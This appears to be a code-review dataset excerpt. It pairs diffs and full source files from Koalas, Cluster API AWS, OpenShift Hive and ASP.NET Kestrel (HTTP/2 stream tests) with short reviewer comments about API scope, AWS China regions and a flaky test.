remove_unused_levels = unsupported_function('remove_unused_levels')
reorder_levels = unsupported_function('reorder_levels')
repeat = unsupported_function('repeat')
searchsorted = unsupported_function('searchsorted')
set_codes = unsupported_function('set_codes')
set_labels = unsupported_function('set_labels')
set_levels = unsupported_function('set_levels')
set_names = unsupported_function('set_names')
set_value = unsupported_function('set_value')
slice_indexer = unsupported_function('slice_indexer')
slice_locs = unsupported_function('slice_locs')
sort = unsupported_function('sort')
sort_values = unsupported_function('sort_values')
sortlevel = unsupported_function('sortlevel')
swaplevel = unsupported_function('swaplevel')
symmetric_difference = unsupported_function('symmetric_difference')
take = unsupported_function('take')
to_flat_index = unsupported_function('to_flat_index')
to_frame = unsupported_function('to_frame')
to_native_types = unsupported_function('to_native_types')
to_numpy = unsupported_function('to_numpy')
transpose = unsupported_function('transpose')
truncate = unsupported_function('truncate')
union = unsupported_function('union')
value_counts = unsupported_function('value_counts')
view = unsupported_function('view')
where = unsupported_function('where')
# Deprecated functions
get_duplicates = unsupported_function('get_duplicates', deprecated=True)
summary = unsupported_function('summary', deprecated=True)
to_hierarchical = unsupported_function('to_hierarchical', deprecated=True)
get_values = unsupported_function('get_values', deprecated=True)
contains = unsupported_function('contains', deprecated=True)
item = unsupported_function('item', deprecated=True)
# Functions we won't support.
values = common.values(unsupported_property)
array = common.array(unsupported_property)
codes = unsupported_property(
'codes',
reason="'codes' requires to collect all data into the driver which is against the "
"design principle of Koalas. Alternatively, you could call 'to_pandas()' and"
" use 'codes' property in pandas.")
levels = unsupported_property(
'levels',
reason="'levels' requires to collect all data into the driver which is against the "
"design principle of Koalas. Alternatively, you could call 'to_pandas()' and"
" use 'levels' property in pandas.")
__iter__ = common.__iter__(unsupported_function)
# Properties we won't support.
memory_usage = common.memory_usage(unsupported_function)
to_list = common.to_list(unsupported_function)
tolist = common.tolist(unsupported_function)
| 1 | 13,046 | Should remove in `_MissingPandasLikeMultiIndex:` too | databricks-koalas | py |
@@ -107,6 +107,10 @@ type AWSLoadBalancerSpec struct {
// Defaults to false.
// +optional
CrossZoneLoadBalancing bool `json:"crossZoneLoadBalancing,omitempty"`
+
+ // Subnets specifies the subnets that should be used by the load balancer
+ // +optional
+ Subnets Subnets `json:"subnets,omitempty"`
}
// AWSClusterStatus defines the observed state of AWSCluster | 1 | /*
Copyright 2019 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package v1alpha3
import (
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
clusterv1 "sigs.k8s.io/cluster-api/api/v1alpha3"
)
const (
// ClusterFinalizer allows ReconcileAWSCluster to clean up AWS resources associated with AWSCluster before
// removing it from the apiserver.
ClusterFinalizer = "awscluster.infrastructure.cluster.x-k8s.io"
)
// AWSClusterSpec defines the desired state of AWSCluster
type AWSClusterSpec struct {
// NetworkSpec encapsulates all things related to AWS network.
NetworkSpec NetworkSpec `json:"networkSpec,omitempty"`
// The AWS Region the cluster lives in.
Region string `json:"region,omitempty"`
// SSHKeyName is the name of the ssh key to attach to the bastion host. Valid values are empty string (do not use SSH keys), a valid SSH key name, or omitted (use the default SSH key name)
// +optional
SSHKeyName *string `json:"sshKeyName,omitempty"`
// ControlPlaneEndpoint represents the endpoint used to communicate with the control plane.
// +optional
ControlPlaneEndpoint clusterv1.APIEndpoint `json:"controlPlaneEndpoint"`
// AdditionalTags is an optional set of tags to add to AWS resources managed by the AWS provider, in addition to the
// ones added by default.
// +optional
AdditionalTags Tags `json:"additionalTags,omitempty"`
// ControlPlaneLoadBalancer is optional configuration for customizing control plane behavior
// +optional
ControlPlaneLoadBalancer *AWSLoadBalancerSpec `json:"controlPlaneLoadBalancer,omitempty"`
// ImageLookupFormat is the AMI naming format to look up machine images when
// a machine does not specify an AMI. When set, this will be used for all
// cluster machines unless a machine specifies a different ImageLookupOrg.
// Supports substitutions for {{.BaseOS}} and {{.K8sVersion}} with the base
// OS and kubernetes version, respectively. The BaseOS will be the value in
// ImageLookupBaseOS or ubuntu (the default), and the kubernetes version as
// defined by the packages produced by kubernetes/release without v as a
// prefix: 1.13.0, 1.12.5-mybuild.1, or 1.17.3. For example, the default
// image format of capa-ami-{{.BaseOS}}-?{{.K8sVersion}}-* will end up
// searching for AMIs that match the pattern capa-ami-ubuntu-?1.18.0-* for a
// Machine that is targeting kubernetes v1.18.0 and the ubuntu base OS. See
// also: https://golang.org/pkg/text/template/
// +optional
ImageLookupFormat string `json:"imageLookupFormat,omitempty"`
// ImageLookupOrg is the AWS Organization ID to look up machine images when a
// machine does not specify an AMI. When set, this will be used for all
// cluster machines unless a machine specifies a different ImageLookupOrg.
// +optional
ImageLookupOrg string `json:"imageLookupOrg,omitempty"`
// ImageLookupBaseOS is the name of the base operating system used to look
// up machine images when a machine does not specify an AMI. When set, this
// will be used for all cluster machines unless a machine specifies a
// different ImageLookupBaseOS.
ImageLookupBaseOS string `json:"imageLookupBaseOS,omitempty"`
// Bastion contains options to configure the bastion host.
// +optional
Bastion Bastion `json:"bastion"`
}
type Bastion struct {
// Enabled allows this provider to create a bastion host instance
// with a public ip to access the VPC private network.
// +optional
Enabled bool `json:"enabled"`
}
// AWSLoadBalancerSpec defines the desired state of an AWS load balancer
type AWSLoadBalancerSpec struct {
// Scheme sets the scheme of the load balancer (defaults to Internet-facing)
// +optional
Scheme *ClassicELBScheme `json:"scheme,omitempty"`
// CrossZoneLoadBalancing enables the classic ELB cross availability zone balancing.
//
// With cross-zone load balancing, each load balancer node for your Classic Load Balancer
// distributes requests evenly across the registered instances in all enabled Availability Zones.
// If cross-zone load balancing is disabled, each load balancer node distributes requests evenly across
// the registered instances in its Availability Zone only.
//
// Defaults to false.
// +optional
CrossZoneLoadBalancing bool `json:"crossZoneLoadBalancing,omitempty"`
}
// AWSClusterStatus defines the observed state of AWSCluster
type AWSClusterStatus struct {
// +kubebuilder:default=false
Ready bool `json:"ready"`
Network Network `json:"network,omitempty"`
FailureDomains clusterv1.FailureDomains `json:"failureDomains,omitempty"`
Bastion *Instance `json:"bastion,omitempty"`
}
// +kubebuilder:object:root=true
// +kubebuilder:resource:path=awsclusters,scope=Namespaced,categories=cluster-api
// +kubebuilder:storageversion
// +kubebuilder:subresource:status
// +kubebuilder:printcolumn:name="Cluster",type="string",JSONPath=".metadata.labels.cluster\\.x-k8s\\.io/cluster-name",description="Cluster to which this AWSCluster belongs"
// +kubebuilder:printcolumn:name="Ready",type="string",JSONPath=".status.ready",description="Cluster infrastructure is ready for EC2 instances"
// +kubebuilder:printcolumn:name="VPC",type="string",JSONPath=".spec.networkSpec.vpc.id",description="AWS VPC the cluster is using"
// +kubebuilder:printcolumn:name="Endpoint",type="string",JSONPath=".status.apiEndpoints[0]",description="API Endpoint",priority=1
// +kubebuilder:printcolumn:name="Bastion IP",type="string",JSONPath=".status.bastion.publicIp",description="Bastion IP address for breakglass access"
// AWSCluster is the Schema for the awsclusters API
type AWSCluster struct {
metav1.TypeMeta `json:",inline"`
metav1.ObjectMeta `json:"metadata,omitempty"`
Spec AWSClusterSpec `json:"spec,omitempty"`
Status AWSClusterStatus `json:"status,omitempty"`
}
// +kubebuilder:object:root=true
// AWSClusterList contains a list of AWSCluster
type AWSClusterList struct {
metav1.TypeMeta `json:",inline"`
metav1.ListMeta `json:"metadata,omitempty"`
Items []AWSCluster `json:"items"`
}
func init() {
SchemeBuilder.Register(&AWSCluster{}, &AWSClusterList{})
}
| 1 | 15,274 | We should scope this down to the bits that we're actually using, otherwise the API is going to be problematic, as it includes references to NAT gateways and public and/or private subnets. Copying the types to be more local to the task in hand is fine. | kubernetes-sigs-cluster-api-provider-aws | go |
@@ -45,6 +45,12 @@ type AWSDNSZoneSpec struct {
// to these tags,the DNS Zone controller will set a hive.openhsift.io/hostedzone tag
// identifying the HostedZone record that it belongs to.
AdditionalTags []AWSResourceTag `json:"additionalTags,omitempty"`
+
+ // Region is the AWS region to use for route53 operations.
+ // This defaults to us-east-1.
+ // For AWS China, use cn-northwest-1.
+ // +optional
+ Region string `json:"region,omitempty"`
}
// AWSResourceTag represents a tag that is applied to an AWS cloud resource | 1 | package v1
import (
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)
const (
// FinalizerDNSZone is used on DNSZones to ensure we successfully deprovision
// the cloud objects before cleaning up the API object.
FinalizerDNSZone string = "hive.openshift.io/dnszone"
// FinalizerDNSEndpoint is used on DNSZones to ensure we successfully
// delete the parent-link records before cleaning up the API object.
FinalizerDNSEndpoint string = "hive.openshift.io/dnsendpoint"
)
// DNSZoneSpec defines the desired state of DNSZone
type DNSZoneSpec struct {
// Zone is the DNS zone to host
Zone string `json:"zone"`
// LinkToParentDomain specifies whether DNS records should
// be automatically created to link this DNSZone with a
// parent domain.
// +optional
LinkToParentDomain bool `json:"linkToParentDomain,omitempty"`
// AWS specifies AWS-specific cloud configuration
// +optional
AWS *AWSDNSZoneSpec `json:"aws,omitempty"`
// GCP specifies GCP-specific cloud configuration
// +optional
GCP *GCPDNSZoneSpec `json:"gcp,omitempty"`
}
// AWSDNSZoneSpec contains AWS-specific DNSZone specifications
type AWSDNSZoneSpec struct {
// CredentialsSecretRef contains a reference to a secret that contains AWS credentials
// for CRUD operations
CredentialsSecretRef corev1.LocalObjectReference `json:"credentialsSecretRef"`
// AdditionalTags is a set of additional tags to set on the DNS hosted zone. In addition
// to these tags,the DNS Zone controller will set a hive.openhsift.io/hostedzone tag
// identifying the HostedZone record that it belongs to.
AdditionalTags []AWSResourceTag `json:"additionalTags,omitempty"`
}
// AWSResourceTag represents a tag that is applied to an AWS cloud resource
type AWSResourceTag struct {
// Key is the key for the tag
Key string `json:"key"`
// Value is the value for the tag
Value string `json:"value"`
}
// GCPDNSZoneSpec contains GCP-specific DNSZone specifications
type GCPDNSZoneSpec struct {
// CredentialsSecretRef references a secret that will be used to authenticate with
// GCP CloudDNS. It will need permission to create and manage CloudDNS Hosted Zones.
// Secret should have a key named 'osServiceAccount.json'.
// The credentials must specify the project to use.
CredentialsSecretRef corev1.LocalObjectReference `json:"credentialsSecretRef"`
}
// DNSZoneStatus defines the observed state of DNSZone
type DNSZoneStatus struct {
// LastSyncTimestamp is the time that the zone was last sync'd.
// +optional
LastSyncTimestamp *metav1.Time `json:"lastSyncTimestamp,omitempty"`
// LastSyncGeneration is the generation of the zone resource that was last sync'd. This is used to know
// if the Object has changed and we should sync immediately.
LastSyncGeneration int64 `json:"lastSyncGeneration"`
// NameServers is a list of nameservers for this DNS zone
// +optional
NameServers []string `json:"nameServers,omitempty"`
// AWSDNSZoneStatus contains status information specific to AWS
// +optional
AWS *AWSDNSZoneStatus `json:"aws,omitempty"`
// GCPDNSZoneStatus contains status information specific to GCP
// +optional
GCP *GCPDNSZoneStatus `json:"gcp,omitempty"`
// Conditions includes more detailed status for the DNSZone
// +optional
Conditions []DNSZoneCondition `json:"conditions,omitempty"`
}
// AWSDNSZoneStatus contains status information specific to AWS DNS zones
type AWSDNSZoneStatus struct {
// ZoneID is the ID of the zone in AWS
// +optional
ZoneID *string `json:"zoneID,omitempty"`
}
// GCPDNSZoneStatus contains status information specific to GCP Cloud DNS zones
type GCPDNSZoneStatus struct {
// ZoneName is the name of the zone in GCP Cloud DNS
// +optional
ZoneName *string `json:"zoneName,omitempty"`
}
// DNSZoneCondition contains details for the current condition of a DNSZone
type DNSZoneCondition struct {
// Type is the type of the condition.
Type DNSZoneConditionType `json:"type"`
// Status is the status of the condition.
Status corev1.ConditionStatus `json:"status"`
// LastProbeTime is the last time we probed the condition.
// +optional
LastProbeTime metav1.Time `json:"lastProbeTime,omitempty"`
// LastTransitionTime is the last time the condition transitioned from one status to another.
// +optional
LastTransitionTime metav1.Time `json:"lastTransitionTime,omitempty"`
// Reason is a unique, one-word, CamelCase reason for the condition's last transition.
// +optional
Reason string `json:"reason,omitempty"`
// Message is a human-readable message indicating details about last transition.
// +optional
Message string `json:"message,omitempty"`
}
// DNSZoneConditionType is a valid value for DNSZoneCondition.Type
type DNSZoneConditionType string
const (
// ZoneAvailableDNSZoneCondition is true if the DNSZone is responding to DNS queries
ZoneAvailableDNSZoneCondition DNSZoneConditionType = "ZoneAvailable"
// ParentLinkCreatedCondition is true if the parent link has been created
ParentLinkCreatedCondition DNSZoneConditionType = "ParentLinkCreated"
// DomainNotManaged is true if we try to reconcile a DNSZone and the HiveConfig
// does not contain a ManagedDNS entry for the domain in the DNSZone
DomainNotManaged DNSZoneConditionType = "DomainNotManaged"
)
// +genclient
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// DNSZone is the Schema for the dnszones API
// +k8s:openapi-gen=true
// +kubebuilder:subresource:status
type DNSZone struct {
metav1.TypeMeta `json:",inline"`
metav1.ObjectMeta `json:"metadata,omitempty"`
Spec DNSZoneSpec `json:"spec,omitempty"`
Status DNSZoneStatus `json:"status,omitempty"`
}
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// DNSZoneList contains a list of DNSZone
type DNSZoneList struct {
metav1.TypeMeta `json:",inline"`
metav1.ListMeta `json:"metadata,omitempty"`
Items []DNSZone `json:"items"`
}
func init() {
SchemeBuilder.Register(&DNSZone{}, &DNSZoneList{})
}
| 1 | 10,891 | Is it is a hard requirement for this field to be 'cn-northwest-1' when wanting to interact with AWS China? It appears that putting in 'cn-north-1' would also result in using the alternative API endpoint (with the region overridden to use 'cn-northwest-1' for the created AWS client). | openshift-hive | go |
@@ -812,7 +812,7 @@ namespace Microsoft.AspNetCore.Server.Kestrel.Core.Tests
Assert.IsType<Http2StreamErrorException>(thrownEx.InnerException);
}
- [Fact]
+ [Fact(Skip="Flaky test #2799")]
public async Task ContentLength_Received_MultipleDataFramesOverSize_Reset()
{
IOException thrownEx = null; | 1 | // Copyright (c) .NET Foundation. All rights reserved.
// Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information.
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.ExceptionServices;
using System.Threading;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Connections;
using Microsoft.AspNetCore.Http;
using Microsoft.AspNetCore.Http.Features;
using Microsoft.AspNetCore.Server.Kestrel.Core.Features;
using Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http2;
using Microsoft.AspNetCore.Testing;
using Microsoft.Extensions.Logging;
using Microsoft.Net.Http.Headers;
using Moq;
using Xunit;
namespace Microsoft.AspNetCore.Server.Kestrel.Core.Tests
{
public class Http2StreamTests : Http2TestBase
{
[Fact]
public async Task HEADERS_Received_EmptyMethod_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, ""),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "localhost:80"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.FormatHttp2ErrorMethodInvalid(""));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task HEADERS_Received_InvlaidCustomMethod_Reset()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "Hello,World"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "localhost:80"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.FormatHttp2ErrorMethodInvalid("Hello,World"));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task HEADERS_Received_CustomMethod_Accepted()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "Custom"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, "localhost:80"),
};
await InitializeConnectionAsync(_echoMethod);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 70,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("Custom", _decodedHeaders["Method"]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
public async Task HEADERS_Received_CONNECTMethod_Accepted()
{
await InitializeConnectionAsync(_echoMethod);
// :path and :scheme are not allowed, :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "CONNECT") };
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 71,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2HeadersFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("CONNECT", _decodedHeaders["Method"]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
public async Task HEADERS_Received_OPTIONSStar_LeftOutOfPath()
{
await InitializeConnectionAsync(_echoPath);
// :path and :scheme are not allowed, :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "OPTIONS"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Path, "*")};
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 75,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2HeadersFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(5, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("", _decodedHeaders["path"]);
Assert.Equal("*", _decodedHeaders["rawtarget"]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
public async Task HEADERS_Received_OPTIONSSlash_Accepted()
{
await InitializeConnectionAsync(_echoPath);
// :path and :scheme are not allowed, :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "OPTIONS"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Path, "/")};
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 76,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2HeadersFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(5, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("/", _decodedHeaders["path"]);
Assert.Equal("/", _decodedHeaders["rawtarget"]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
public async Task HEADERS_Received_PathAndQuery_Seperated()
{
await InitializeConnectionAsync(context =>
{
context.Response.Headers["path"] = context.Request.Path.Value;
context.Response.Headers["query"] = context.Request.QueryString.Value;
context.Response.Headers["rawtarget"] = context.Features.Get<IHttpRequestFeature>().RawTarget;
return Task.CompletedTask;
});
// :path and :scheme are not allowed, :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Path, "/a/path?a&que%35ry")};
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 118,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2HeadersFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(6, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("/a/path", _decodedHeaders["path"]);
Assert.Equal("?a&que%35ry", _decodedHeaders["query"]);
Assert.Equal("/a/path?a&que%35ry", _decodedHeaders["rawtarget"]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Theory]
[InlineData("/","/")]
[InlineData("/a%5E", "/a^")]
[InlineData("/a%E2%82%AC", "/a€")]
[InlineData("/a%2Fb", "/a%2Fb")] // Forward slash, not decoded
[InlineData("/a%b", "/a%b")] // Incomplete encoding, not decoded
[InlineData("/a/b/c/../d", "/a/b/d")] // Navigation processed
[InlineData("/a/b/c/../../../../d", "/d")] // Navigation escape prevented
[InlineData("/a/b/c/.%2E/d", "/a/b/d")] // Decode before navigation processing
public async Task HEADERS_Received_Path_DecodedAndNormalized(string input, string expected)
{
await InitializeConnectionAsync(context =>
{
Assert.Equal(expected, context.Request.Path.Value);
Assert.Equal(input, context.Features.Get<IHttpRequestFeature>().RawTarget);
return Task.CompletedTask;
});
// :path and :scheme are not allowed, :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Path, input)};
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2HeadersFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Theory]
[InlineData(HeaderNames.Path, "/")]
[InlineData(HeaderNames.Scheme, "http")]
public async Task HEADERS_Received_CONNECTMethod_WithSchemeOrPath_Reset(string headerName, string value)
{
await InitializeConnectionAsync(_noopApplication);
// :path and :scheme are not allowed, :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "CONNECT"),
new KeyValuePair<string, string>(headerName, value) };
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR, CoreStrings.Http2ErrorConnectMustNotSendSchemeOrPath);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task HEADERS_Received_SchemeMismatch_Reset()
{
await InitializeConnectionAsync(_noopApplication);
// :path and :scheme are not allowed, :authority is optional
var headers = new[] { new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "https") }; // Not the expected "http"
await SendHeadersAsync(1, Http2HeadersFrameFlags.END_HEADERS | Http2HeadersFrameFlags.END_STREAM, headers);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.PROTOCOL_ERROR,
CoreStrings.FormatHttp2StreamErrorSchemeMismatch("https", "http"));
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task HEADERS_Received_MissingAuthority_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
public async Task HEADERS_Received_EmptyAuthority_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.Authority, ""),
};
await InitializeConnectionAsync(_noopApplication);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders["content-length"]);
}
[Fact]
public async Task HEADERS_Received_MissingAuthorityFallsBackToHost_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>("Host", "abc"),
};
await InitializeConnectionAsync(_echoHost);
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 65,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(4, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.Equal("abc", _decodedHeaders[HeaderNames.Host]);
}
[Fact]
public async Task HEADERS_Received_EmptyAuthorityIgnoredOverHost_200Status()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
